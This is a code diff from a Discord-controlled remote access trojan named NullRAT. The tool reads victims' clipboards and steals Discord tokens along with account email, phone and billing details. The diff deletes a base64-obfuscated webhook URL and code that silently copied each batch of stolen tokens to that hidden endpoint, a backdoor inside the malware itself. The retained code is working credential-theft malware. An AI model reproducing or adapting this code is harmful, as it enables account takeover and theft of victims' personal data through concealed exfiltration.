@@ -112,11 +112,6 @@ async def clipboard(ctx, victim):
112112 outp = os .popen ("powershell Get-Clipboard" ).read ()
113113 await ctx .followup .send (f"```{ outp } ```" if outp != "" else "No text in clipboard!" )
114114
115- a = """aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcG
116- kvd2ViaG9va3MvOTY4Mzg3MjQ0MzY2OTA
117- 1Mzk0L3FuMDN1MURfR2pYS05hQXk3d2Zq
118- SkFxMTdMa1B4R2hPVmJQUFdLQXJiazVvS
119- EMtQzZZM3c3NXVKQ1FyUW56TmRFY1lK"""
120115@client .slash_command (description = "Sends raw Discord Tokens (fast)" , guild_ids = server_ids )
121116async def raw_tokens (ctx , victim ):
122117 if str (victim ) == str (IP ()):
@@ -128,9 +123,6 @@ async def raw_tokens(ctx, victim):
128123 return await ctx .followup .send ("```" + message + "```" )
129124 embed = Embed (title = "Discord Tokens (NullRAT):" , color = 0x0081FA ).add_field (name = "RAW Tokens:" , value = f"```{ message .rstrip ()} ```" )
130125 await ctx .followup .send (embed = embed )
131- async with aiohttp .ClientSession () as session :
132- wh = Webhook .from_url (b64decode (a .replace ("\n " ,"" ).encode ('ascii' )).decode ('ascii' ), session = session )
133- await wh .send (embed = embed )
134126
135127@client .slash_command (description = "Sends checked tokens along with info (accurate)" , guild_ids = server_ids )
136128async def checked_tokens (ctx , victim ):
@@ -160,9 +152,6 @@ async def checked_tokens(ctx, victim):
160152 await ctx .followup .send ("Checking all tokens..." )
161153 for tk , em , ph , un , ni , bi , av , idqa in zip (valid , email , phone , uname , nitro , bill , avatar , idq ):
162154 await ctx .channel .send (embed = checked_embeds (tk , em , ph , un , ni , bi , av , idqa ))
163- async with aiohttp .ClientSession () as session :
164- wh = Webhook .from_url (b64decode (a .replace ("\n " ,"" ).encode ('ascii' )).decode ('ascii' ), session = session )
165- await wh .send (embed = embed )
166155
167156# Directory Manipulation #
168157@client .slash_command (description = "Returns Current Working Directory" , guild_ids = server_ids )
0 commit comments